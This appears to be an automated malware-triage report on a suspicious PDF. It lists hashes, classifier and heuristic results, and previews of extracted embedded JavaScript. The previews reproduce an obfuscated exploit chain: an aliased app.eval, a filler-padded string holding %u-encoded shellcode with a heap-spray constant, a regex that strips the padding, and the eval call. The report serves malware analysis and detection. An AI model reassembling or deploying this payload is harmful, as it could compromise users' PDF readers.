PDF static analysis report

Static analysis result for SHA-256 b057e78ca6505354…

SUSPICIOUS

PDF

59.6 KB Created: 2009-12-20 15:25:59 +03:00 Authoring application: bcComesMore (via f675d8aec99e98b4e62c6aae5fb12fb6) First seen: 2013-06-22
MD5: b59d0b86249c52b701f6a0b1bd0f1cd9 SHA-1: b48ddb1b6dc7676191a3c25501a5b372319c4ca6 SHA-256: b057e78ca6505354da1c238d1c7444f333850ea54c21b64db49faa0f7f2cefee
56 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

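The PDF file was flagged as suspicious by a machine learning classifier with a high confidence score. Several heuristics indicate the presence of embedded JavaScript, which is often used to download and execute malicious payloads. The extracted script previews below show a staged chain split across /JS objects: object 19 aliases `app.eval`, object 20 holds a long string padded with filler characters (`#`, `@`, `$`, `~`, `?`), object 21 strips those characters with a regular expression, and object 23 passes the cleaned string to the aliased eval, so no single object contains readable code. The padded string contains `%u`-encoded data and the constant 0x0c0c0c0c, which is consistent with a heap-spray style exploit payload, although this static report does not confirm it. No specific URLs or hashes were extracted, limiting the ability to identify a specific family or provide concrete IOCs beyond the file and artifact hashes listed in this report. The ML_NYX_PDF_MALICIOUS heuristic strongly suggests malicious intent. Note that the ATT&CK mapping above is T1059.001 (PowerShell), while the evidence shown here is PDF-embedded JavaScript; T1059.007 (JavaScript) matches the visible artifacts more directly, so treat the PowerShell mapping as unverified.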

Machine Learning

  • Nyx PDF Classifier malicious score 0.9994

Heuristics 4

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 6

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0019_000.js pdf-javascript-stream PDF /JS object 19 at offset 0x2C9C 2872 bytes
SHA-256: cdcce31ee80dacc3f6b5d57ed074bf51a4e3d4368f1fea69cd2ed3f1d2b1c937
Preview script
First 1,000 lines of the extracted script
�� t h i s . r K 1 Y o V b M X = n u l l ; t h i s . m W K X d o g i u = n u l l ; f u n c t i o n   l 0 s D H u I o ( c O W u h z o X W ) { r e t u r n   c O W u h z o X W ; } v a r   e Z k 6 g y 2 h = " m F b n 3 s x V T " ; t h i s . b 5 C t x B W d l = ' e l v Q u M U j ' ; f u n c t i o n   g s q C e 4 S H U ( y 7 3 q b J 6 F K 7 , t z K R Z L 6 x p ) { } f u n c t i o n   g k Q 9 R M V k O ( ) { r e t u r n   f a l s e ; } f u n c t i o n   v n j z Z 4 a R l y ( ) { r e t u r n   f a l s e ; } v a r   g Z 8 q u u r Q = n e w   A r r a y ( ) ; g Z 8 q u u r Q [ 0 ] = 2 2 6 8 6 ; g Z 8 q u u r Q [ 1 ] = 3 9 6 7 ; v a r   f k M v 8 l a y = n e w   A r r a y ( 3 7 6 6 , 2 6 5 5 1 ) ; t h i s . q m 5 X t 2 v 2 j F = n u l l ; v a r   d e M C t H v i Z M = n e w   A r r a y ( 9 7 6 , 1 2 2 3 3 , 1 8 1 2 6 ) ; t h i s . l 0 k M x c J v 0 d = f a l s e ; f u n c t i o n   w v j e G n J Y ( s o 4 a T Y o X T , s n G J N 3 3 1 t , j 4 G Q 9 8 Y l ) { } v a r   h 3 L b Q 2 2 V E = n e w   A r r a y ( 8 3 0 0 , 2 6 1 6 5 , 2 3 2 4 2 ) ; s p m j h e A T v Q = f a l s e ; f u n c t i o n   y Y u C p J E 7 U z ( g B q V c u f P ) { r e t u r n   f a l s e ; } v a r   v 1 i P 6 7 8 F = n e w   A r r a y ( ) ; v 1 i P 6 7 8 F [ 0 ] = 3 1 6 6 4 ; v 1 i P 6 7 8 F [ 1 ] = 3 1 2 7 3 ; f u n c t i o n   i Y V 1 a q h p B l ( ) { } f u n c t i o n   m 5 i Z i e 8 z f x ( f x a P m 5 D a 6 5 , o y q M g 9 U d i ) { r e t u r n   f a l s e ; } v a r   h 4 Q M S J e N   =   a p p . 
e v a l ; v a r   d e i U H H g O = n e w   A r r a y ( ) ; d e i U H H g O [ 0 ] = 2 1 0 5 5 ; d e i U H H g O [ 1 ] = 2 6 3 8 0 ; v a r   k L w F L V N e q 6 = n e w   A r r a y ( ' a U D Q y 4 M m ' , ' u s H G j n 5 7 y A ' ) ; f u n c t i o n   r K D q R z G c q j ( r t o 9 F 0 L q c , g B D m A a x b ) { r e t u r n   r t o 9 F 0 L q c ; } q c f U O n E 9 = n u l l ; v a r   e 6 s u D a 6 X z = n e w   A r r a y ( ) ; e 6 s u D a 6 X z [ 0 ] = 3 2 5 5 1 ; e 6 s u D a 6 X z [ 1 ] = 1 3 7 8 0 ; e 6 s u D a 6 X z [ 2 ] = 1 3 1 8 1 ; v a r   v a I E k 3 h t = n e w   A r r a y ( ) ; v a I E k 3 h t [ 0 ] = 1 6 3 7 9 ; f u n c t i o n   q y U M 2 Y S e F ( ) { } v a r   z D 2 v U t I s E m = f a l s e ; v a r   d 5 l j G 0 V L S = n e w   A r r a y ( ) ; d 5 l j G 0 V L S [ 0 ] = 2 4 7 5 ; w 5 V J j f B L 9 7 = " g K j S J Z z x P " ; v a r   r b C K G e 1 u = n e w   A r r a y ( 1 5 0 1 1 , 2 0 8 9 6 , 1 2 6 3 3 ) ; f u n c t i o n   e R J H Z s N e ( n O A l a E q z p , u O m Y 4 g 6 c 0 N , v p 8 X 1 P G o m ) { r e t u r n   v p 8 X 1 P G o m ; } v a r   s A e L q z N D q = n e w   A r r a y ( ) ; s A e L q z N D q [ 0 ] = 1 9 2 1 9 ; s A e L q z N D q [ 1 ] = 2 9 0 0 8 ; f u n c t i o n   x q 1 e c 4 S X 9 ( r Q A v N w 5 l c , j l S x l V 5 y ) { r e t u r n   r Q A v N w 5 l c ; } v a r   v d a R U D y y Z i = n e w   A r r a y ( 1 9 1 5 3 , 1 4 6 4 6 ) ;
javascript_obj0020_001.js pdf-javascript-stream PDF /JS object 20 at offset 0x3832 4096 bytes
SHA-256: a397c1d77e15682e3123ce563ea5c72f03f9dcc8a2b828493fec9e7c27615308
Preview script
First 1,000 lines of the extracted script
function hCFoLHY94(ykbIuj9E,dNo59cnUW){return ykbIuj9E;}var qfBpRTo7O=new Array();qfBpRTo7O[0]=24602;function oEyKggwzG(){return false;}kf95iLOhf='uyl3n8VTg';function ngP2Xko2i(gl6JA9Ugg,uQUXFyD8w){return false;}function hhqzf1M7fG(pElQCw8Y,eEAV30sB,gdss6lsOp){return pElQCw8Y;}function fefynbK1y(l4GK9i7jU){return false;}var jOjcEYyss=new Array();jOjcEYyss[0]=9288;jOjcEYyss[1]=4833;var o4it7YnCx1=new Array();o4it7YnCx1[0]=8628;o4it7YnCx1[1]=25053;o4it7YnCx1[2]=12626;function fjZGHOQIQ(rBEckMHjQ,lB7fx7xbEi){return false;}var rfrZf3jsUR=new Array();rfrZf3jsUR[0]=17170;rfrZf3jsUR[1]=15075;rfrZf3jsUR[2]=27872;this.o5H1s7ks=null;this.x4ysWMW41=31953;var bby2f4La = 'v?a?r? ?m?Z$F#b~5$4@v@s$6$0~ $=~ ?n@e#w# $A?r#r?a?y@(~)$;$v@a?r@ #g@p?i?U?B~m?W~S?L$b@;@f#u@n@c@t~i@o?n@ #j#M?E@z~9#A@b$i@0$z~(?v$4$Y?U~y#H@T~r$X#t$,~ #m#R~L?y@0~S~9~s#g@)#{#w?h?i$l$e$(#v$4$Y?U#y~H#T?r@X#t?.~l#e$n#g~t$h? ~*~ ?2~ ?<? @m#R$L?y$0~S$9~s?g@)?{?v$4$Y#U?y$H@T~r#X?t~ #+#=? $v?4?Y?U~y$H~T#r@X@t$;~}#v$4~Y?U#y@H~T~r?X@t? @=$ @v~4#Y?U$y@H~T~r@X#t@.@s$u?b$s$t~r$i@n@g@(#0@,@ #m~R?L?y?0#S?9@s$g$ $/$ ~2$)$;~r~e$t$u$r~n~ @v?4?Y~U@y#H#T$r#X@t#;$}@f~u?n$c?t~i~o@n# ?k~B#K~d$x#A?c$e~9@($h@I?X$c~W#q@u@G$R@)${?i#f@(#h~I?X~c$W?q?u?G@R? ?=@=# $0~)${@v#a~r~ #v@b?A?l#T?K~D~q@ @=# ~0@x?0~c$0$c@0$c@0$c$;$v?a@r@ ?p~L~A@C~V#X?J@j~J? 
$=~ $n$e$w# #A~r@r#a~y~(@\"?%#u~9@c$6?\"#,~\"@0~%@u@0~0~e$\"$,$\"@8?%$u@0?0?0$\"$,$\"?0~%~u$5?d@\"#,~\"~0?0@%?u@e#d?8$3$%@\"~,$\"~u?b~8#0$7#%?u@8?\"#,?\"@5?c#3?%#u~6#\"@,?\"?e~0~4@%#u?e$0?\"$,$\"$b?9@%@u@0@0?0@1#%?u#\"$,?\"$3$1@0$0$%@u@0~\"~,@\"@d$4#4$%~u#\"~,~\"?8?3#1?a@%@u~0#4~e#\"~,?\"#9?%?u$f#7$7@5@\"#,~\"@%?u~b?4?3#f#%#u~0$a#\"$,~\"~c#4#%$u$8?0@c?0$\"@,#\"#%~u$6$e~3#\"~,$\"@4@%~u~8#5#c@3$%#\"$,$\"@u?6?2?7~c@%@u#\"?,?\"$c?5?4~8@%#u#e$5#0$8#\"$,~\"?%?u~9?9~b$3$%$u$e?\"~,$\"$5#a@9$%?u#8#d@9~\"?,?\"~b@%@u?6$7$e@f#\"@,@\"?%@u#c#5#4$8?%#u?e#\"$,@\"@3?3?0$%?u?f?9~8~\"@,$\"~3~%?u@3#6$8@f#%~u?\"~,~\"$6~d~f?f$%$\"$,#\"@u@6#f?1?b$%?\"$,#\"#u$8$5~c?3@%@u?f@b@\"?,#\"~8$9$%#u?8?\"$,$\"~4@8@6#%#u~6?e?0$4@%@\"@,#\"@u?7#a~9~1?%~u?\"$,$\"@6$9#9#1#%~u#8?\"~,#\"@5?c#2?%$u#\"?,?\"~e#3#0~4?%@\"#,@\"#u@d$5?5#6@%~\"#,@\"@u~6$e?0?5#%~u$d$\"?,?\"?7?c#3@%?u@9@1$5?\"@,?\"?4$%@u@7~a@5$\"@,~\"@6$%?u#6#e$0~4?\"?,$\"~%@u@0~c?c$3#%~u~\"$,~\"?6@1?8$1~%@u@8$\"@,?\"@5@c~2@%~u@e#\"~,~\"#3$0@4#%#u#9@\"@,?\"#6?5?6@%?u@\"$,$\"#6$e?0~5~%#\"@,~\"~u#d$7~c#3$%~u?8@5@6~\"~,?\"$c$%$u@8~5~c$3?\"$,#\"@%?u#9~1~0@4~%~u?\"~,~\"~8@6#5$6#%~u@6$\"$,#\"?e@0~5~%$u#0#8@\"~,@\"$c#3?%?u?6~b@\"$,$\"#9#8@%~u#8$4~d?0~%#u#\"?,#\"$6?e@0?4#%~u@\"?,?\"$3~0#4?e~%~\"$,$\"$u@6~e~c?e~%#\"~,~\"~u@8#5@c$3#%@u~\"~,?\"#d?3@8$9~%@\"?,#\"#u$8#5#1@4@\"~,#\"@%~u@6~e$0@4@%@u?4@c@\"?,#\"~f@2~%$u~e@a~a?8~%$u~\"@,$\"@f?1~0$3#%?u~e@6#0@\"~,?\"@2$%~u$8#e$c$\"@,?\"@7~%#u@8~5?4~5$%@u$\"~,~\"#0~d?3$6?%~u$6#5$\"~,#\"~0~0?%?u?8#5?a@9?%#u$\"~,?\"$6?e@6?e~%$u~\"~,$\"?1$0~4#e~%~\"@,#\"$u$6@f~1#7@%$u#8?\"?,~\"?5@c#3#%~u?3~9@\"@,@\"~5#6~%?u@8@\"@,@\"?5$a$9$%#u?f~b@\"$,$\"~f?b~%$u$8$\"#,$\"@4@c?c$%?u$6~e#0?4#\"?,~\"~%~u#8?0~a~9#%~u?\"~,$\"$f$b$8@9?%~u$\"#,$\"?8~4?d@0$%@u#6#e#0$4@\"?,@\"?%$u?7#a~9$1~%~u?6?5#\"$,@\"#9$1?%?u~8~5$c?\"@,~\"#2#%~u~5@e$0$\"$,$\"#4@%~u@2~b$0?3~\"$,#\"#%~u?9~3$7@1$\"?,$\"$%~u$b?a?4$3?%#u@1?\"~,$\"#b#b$f@%@u@1#8?\"@,@\"~0~0#%@u#a~d$6~5~\"#,~\"@%$u?e?a$b?4~%~u~0@a?\"#,$\"$7?6@%$u?e$\"~,#\"?9?8@2?%?u~0$1?7#7?\"$,~\"$%@u$e#0@e@d#%$u$
\"#,#\"?0$b~7$c?%#u$\"@,#\"~e?d$c@3?%@u?1$a#\"$,~\"@7~0~%?u?b#f~b#\"$,@\"#3$%?u@4~1$2@b#\"#,$\"$%@u$f~c#a@e#%#\"@,$\"#u#1@b?6~9?%@u?e~c~b@\"@,~\"@0?%@u$5?d~6$7?%?u@a@\"$,?\"~b$f$a@%#u@\"$,?\"#0#b$6#a$%?u~a?a#\"@,@\"~b$7?%$u$4$1#3~5$%$u#\"#,?\"$f@5$b@6$%$u#0#f~6@\"?,?\"?0?%?u~e@0~b$7#%~u?1#\"~,#\"@e@2?a@%~u@f@5$a#b#%#\"$,@\"$u$0#7?3@b#%@\"~,@\"?u@b@8~a$7@%?u@\"~,#\"@6?e@3~7$%$u~8$5~7$8@\"~,#\"#%$u@6@e@0?4@%~u$8?5@\"~,#\"~c?3?%?u$6~e?\"#,~\"?0@4~%@u$8@5?\"@,@\"#c#3~%$u~6#\"$,$\"~e~0#4#%$u?8@5?\"~,~\"?c$3?%#u~6#e~\"~,#\"~0~4~%~u~7?a$c#3$%$u#\"?,@\"?6$e$0$4@%?u?c~2~c~\"?,~\"#3@%~u@1#a?6$1$%$u#f$\"?,?\"~7~9~3#%$u$0~d#6@\"?,$\"$b?%@u~e?1?8$2?%$\"?,@\"#u~1~c?6#0?%$u$f@\"$,~\"$6#a#6$%@u@6#e@\"#,@\"~7#7$%~u@e$0#8?4$\"#,?\"#%$u?3@a$7~\"?,$\"$0?%@u#e$8?\"#,~\"?a#6~%?u@3?e#7~\"?,?\"#4$%~u#f?1@a?2@%?\"@
javascript_obj0021_002.js pdf-javascript-stream PDF /JS object 21 at offset 0xD053 2578 bytes
SHA-256: 1411d4ed0ae76ecc1396c54b913a36f1c79f9c3782380a7fd78ce6fbc735e30f
Preview script
First 1,000 lines of the extracted script
�� v a r   d h A 4 s 5 J E 0 T = n u l l ; v a r   m U X G y v o 6 = f a l s e ; v a r   i z G 1 5 3 r X = n e w   A r r a y ( ' s C 0 0 R G W d t ' , ' b N j q z G 9 J 9 ' ) ; v a r   d T 1 y O m 6 6 B = n u l l ; f u n c t i o n   y R 7 y V m j X ( ) { } q Y 0 5 5 I j N = ' k D j M T K T B l O ' ; v a r   e z i X Z c N w I J = " x A c 5 P 2 A E " ; f u n c t i o n   h 6 A F o W h y s m ( t T E N C o 7 p u , i p z Z x 1 D c V W , d V R P C B X p L P ) { r e t u r n   t T E N C o 7 p u ; } p S v x 9 H 4 9 = 0 . 3 6 2 4 3 9 4 ; f u n c t i o n   r y R L G r n K E ( ) { r e t u r n   f a l s e ; } t h i s . b I u a U d n n = ' m q N 8 B N b 9 ' ; f u n c t i o n   r B N r o k r T 1 V ( ) { } f u n c t i o n   e x j L S r U H Q ( a S 1 y o J H S 1 , h 6 U j 9 O 7 h h Q , f B 5 t x w e P c ) { r e t u r n   h 6 U j 9 O 7 h h Q ; } o F q Y 2 A C I Y a = " h W 2 w U z O l " ; t M E z N 1 M n J = " a 7 L a g 3 u S F w " ; v a r   h A t F H S C v M   =   b b y 2 f 4 L a . r e p l a c e ( / [ # @ \ $ ~ \ ? 
] / g ,   ' ' ) ; f u n c t i o n   z T y S W n M i v ( e 8 l v C g E p 1 , q O Y k 2 X Z 8 N , a O f B q S e k Q k ) { r e t u r n   e 8 l v C g E p 1 ; } v a r   j P P z y z z Q K a = " d E a L C k T 6 S 7 " ; f u n c t i o n   p 3 6 h K O x T b ( h 7 h U W f H e , z G D 8 I C Q Q L ) { r e t u r n   z G D 8 I C Q Q L ; } v a r   r T 0 f C 0 3 B = n u l l ; f u n c t i o n   c g T e p 9 Q Z P ( b T w X 3 6 y 4 t 8 , m K X P u o x 0 A ) { r e t u r n   m K X P u o x 0 A ; } v a r   h P k 9 V v Z U = n e w   A r r a y ( ) ; h P k 9 V v Z U [ 0 ] = 1 0 7 9 1 ; v a r   v k F n V G X w V Z = n e w   A r r a y ( ) ; v k F n V G X w V Z [ 0 ] = 2 3 9 3 9 ; v k F n V G X w V Z [ 1 ] = 2 7 3 9 2 ; v a r   q P 0 y A B S K q = n e w   A r r a y ( ' a E O x Y r R i Q ' , ' m 1 q w P 2 a g ' ) ; v a r   r 8 Q 4 s P p 4 D 7 = " u u n f R t 3 1 " ; f u n c t i o n   e w D B Z n t S A ( ) { r e t u r n   f a l s e ; } v a r   f J 9 M u l u w = n e w   A r r a y ( ' k 4 Q y 6 0 4 X g w ' , ' s b O I r Q N 6 ' , ' z 9 e x 2 c A K Y ' ) ; f u n c t i o n   x W s b T f d P 8 f ( l A P 5 T B r q V k , f 2 U U A 0 w f , h O B q d B t e z ) { r e t u r n   f a l s e ; } f u n c t i o n   q 9 P o i q 2 W ( s p m H 2 1 b X , j f O U M f H y j q ) { r e t u r n   f a l s e ; } f u n c t i o n   k d 5 n 9 W 3 H ( u r i R e u a M v , i 9 N Z b 1 r M , k K l D U q j k U ) { r e t u r n   k K l D U q j k U ; } t h i s . o i b L 8 j u 6 = ' z l y z h W V m h ' ; f u n c t i o n   k i X W P Q q Z ( c N f u o d T f , r V i t 4 E e 7 ) { r e t u r n   r V i t 4 E e 7 ; }
javascript_obj0022_003.js pdf-javascript-stream PDF /JS object 22 at offset 0xDAB9 902 bytes
SHA-256: b631107836447ce28210e01a528d09477037bd0c1d2851f686e6916948b0519f
Preview script
First 1,000 lines of the extracted script
�� f u n c t i o n   z P j x q G 7 P g ( d H t G i j j y p , o C i 8 j h U D s ) { r e t u r n   d H t G i j j y p ; } f u n c t i o n   f g S o n a h x g ( x V U x c 0 t z R , y k U 3 X q 9 y A ) { } f u n c t i o n   l 3 t c Y W d 5 v ( s Q z 7 k K j l x , w u E u k x W n ) { } n k H h P g 5 q y = f a l s e ; a F N i H D w I s = f a l s e ; v a r   q L q Z H J x s n = n e w   A r r a y ( ) ; q L q Z H J x s n [ 0 ] = 1 7 4 0 0 ; q L q Z H J x s n [ 1 ] = 1 2 4 9 7 ; v a r   y K B Q r M U X 3 = n e w   A r r a y ( " n N Z 0 K U x U I t " , " y k K M E H G w U " ) ; v a r   f E M p B m Y M = n e w   A r r a y ( ' i y c B I 9 G w Q l ' , ' p E U m m T f S ' , ' i e g B q V c u f ' ) ; t h i s . f L j 3 x s e c M O = 2 7 4 9 5 ; i d g T z w Z C 8 = ' h S 0 Y E a u Y ' ; v a r   s e j 0 M S t 9 = n e w   A r r a y ( " b M f G u 6 0 8 Z " , " y D 9 4 8 r 7 w v v " , " f x a P m 5 D a 6 5 " ) ;
javascript_obj0023_004.js pdf-javascript-stream PDF /JS object 23 at offset 0xDE79 2486 bytes
SHA-256: a228ca6d5f0dfecaf99c7e9a10cb3cbd8c39ddd1b670a768484246720f7aa8fa
Preview script
First 1,000 lines of the extracted script
�� f u n c t i o n   k b j o h F s 1 ( b V F 8 N u 2 H , m n 1 3 r t U 2 , o x P y T A Z F ) { r e t u r n   m n 1 3 r t U 2 ; } v a r   d j o Q O z I f 3 = " o h 2 h 4 Q M S " ; v a r   l K d x A c e 9 V = f a l s e ; f u n c t i o n   n J q b W u A o ( r N i m Y v K 1 ) { r e t u r n   f a l s e ; } v a r   d N M q j d Z 1 9 = 0 . 4 7 2 8 8 8 6 2 4 ; v a r   b 8 B a H n Z H L = n e w   A r r a y ( ' n H t L h 8 P v X y ' , ' a k i g P t f B M ' , ' j Y O O y L D T e ' ) ; v a r   g 3 z W v Z E c = n u l l ; f u n c t i o n   z r N E 4 d I d ( ) { } f u n c t i o n   n r j O 2 b A S A ( f V L O D 0 K P , k K A U 7 6 b d W , p Z Z 8 v 7 J y ) { r e t u r n   f V L O D 0 K P ; } v a r   q n G 7 e K a f = n e w   A r r a y ( ) ; q n G 7 e K a f [ 0 ] = 2 2 8 8 9 ; q n G 7 e K a f [ 1 ] = 1 6 3 6 6 ; q n G 7 e K a f [ 2 ] = 2 7 7 9 1 ; v a r   x b l O D 8 q P N = n e w   A r r a y ( ' o s J f N o J I c ' , ' d l D q Y n E y i ' , ' j T k N T O q J ' ) ; f u n c t i o n   m a w k l 0 2 s ( b L 0 O x 0 W w b , k N 7 B 9 X l p s v , b Q a N M 4 O A ) { } f u n c t i o n   w 9 E p N o E 2 ( ) { } v a r   k 2 i I D 1 L 5 N = n e w   A r r a y ( ' n h Z o z q h I ' , ' l B T 1 w a v K r ' ) ; h 4 Q M S J e N ( h A t F H S C v M ) ; v a r   w y y v 9 W 9 s = f a l s e ; f u n c t i o n   w M 9 u D R 1 Z 4 ( z J W 6 7 Q s 2 k H , y 4 S r c 6 h A Z , v Q n B M a b 7 U 0 ) { r e t u r n   z J W 6 7 Q s 2 k H ; } f u n c t i o n   c R L Y h 0 U H T ( z F E f V l D D L 2 , k 8 a x D q a v ) { } f q U b N u 2 W Q = 1 2 2 2 7 ; v a r   o j 6 0 V E N m 1 = 1 0 3 6 3 ; v a r   y d l h O 4 O v B = 3 6 9 7 ; f u n c t i o n   l X 5 E X 1 M 3 ( f f Q Q i Z L K , z k y v v e 8 X , x d F J g 9 I q ) { r e t u r n   f a l s e ; } v a r   b k 8 x p p g t = " g O j O Z K 3 h " ; f u n c t i o n   j B l w 5 e u B Z ( r Z W f R p c L 9 M , z S e Q 4 v g e ) { r e t u r n   z S e Q 4 v g e ; } v a r   e F o m T Q 6 t s g = n e w   A r r a y ( 2 7 3 1 8 , 5 0 4 7 , 2 2 3 0 8 ) ; f u n c t i o n  
 f Z E Q f I 8 I k o ( n i G g 1 u H r D , p B d B H c q Q m , n F G 5 w N p a z ) { r e t u r n   n i G g 1 u H r D ; } f u n c t i o n   l y 8 7 E S S 1 Q ( v z G G 0 K X t D , a h o 6 Z i e c ) { r e t u r n   f a l s e ; } f u n c t i o n   l V z e W g T c ( t j U t Z G q c N , t Y q Q t d G p U , b G t g w D m 6 ) { r e t u r n   t j U t Z G q c N ; } f u n c t i o n   c C b h o L 6 d e ( h H p 2 q b V e W , n t B G F H f I s , q 5 t 7 Z Z J b 0 ) { r e t u r n   f a l s e ; }
stream_005_off00002c9c.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x2C9C 1435 bytes
SHA-256: ed134c6d2a1a0614bdc6bf09bdff6453349b5a93251ff7789f983ea6b81082c0
Detection
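ClamAV: No threats found (a signature-based result; a clean scan does not clear the sample given the classifier and heuristic findings reported above)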
Obfuscation or payload: likely
36 of 59 identifiers look randomly generated (e.g. 'y73qbJ6FK7') — consistent with name-mangling obfuscation.